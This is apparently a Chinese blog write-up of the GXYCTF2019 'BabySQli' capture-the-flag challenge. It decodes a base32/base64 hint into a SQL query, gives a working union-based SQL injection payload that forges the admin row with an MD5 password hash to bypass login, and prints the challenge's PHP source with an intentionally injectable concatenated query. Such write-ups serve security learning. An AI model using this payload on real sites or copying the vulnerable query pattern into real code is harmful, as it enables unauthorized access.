[GXYCTF2019]BabySQli 1

解题步骤【这道题要是没有原吗 有点难想】

  1. 可以通过bp爆破用户名,但这里用手打admin试出来了;密码写了123,显示wrong pass【猜测密码错了】。
  2. F12看有没有提示;涉及一个base32【组成部分只有大写字母和数字数字组成,或后面有三个等号】和base64【组成部分:字母A-Z、a-z、数字0-9,+ , /】;所以猜测这一串可能是base32加密,我这里用kali解密。

进行一次base32解密

powershell 复制代码
echo "MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5" | base32 -d

再一次进行base64解密,得到sql语句

powershell 复制代码
echo "c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==" | base64 -d
  1. 用union联合注入,不知道是不是hackbar的问题,说我的sql语法有错,用bp抓包,修改就没问题(百思不得其解)。202cb962ac59075b964b07152d234b70这个是123通过MD5解密而来的数据。要注意 name=1'不能写成=admin' 这样会查询到两个admin账户,要使只有我们现在查询的admin,只能union前面查询的数据没有显示才行。
    name=1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123

  2. 此题的源码(乱来)

php 复制代码
<?php
require "config.php";
require "flag.php";
//
去除转义
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'"; 
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s\n", mysqli_error($con));
exit();
}
else{
$arr = mysqli_fetch_row($result);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){ #md5加密
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}
?>
相关推荐
索然无味io5 分钟前
组件框架漏洞
前端·笔记·学习·安全·web安全·网络安全·前端框架
Andya_net2 小时前
网络安全 | F5-Attack Signatures-Set详解
网络·数据库·web安全
wit_@4 小时前
深入理解SSH:安全远程登录与高级应用
linux·运维·web安全·ssh·kail
仇辉攻防10 小时前
【云安全】云原生-Docker(五)容器逃逸之漏洞利用
安全·web安全·网络安全·docker·云原生·容器·安全性测试
希望奇迹很安静16 小时前
CTFSHOW-WEB入门-文件包含78-81
学习·web安全·ctf
hcja66619 小时前
CVE-2024-23897-Jenkins任意文件读取漏洞复现
运维·web安全·网络安全·中间件·jenkins
vbsecvey1 天前
SWPU 2022 新生赛--web题
安全·web安全·网络安全
网络安全工程师老王1 天前
Spring FatJar写文件到RCE分析
web安全·网络安全·信息安全
_Cooper_2 天前
MsfVenom木马制作及使用
安全·web安全·网络安全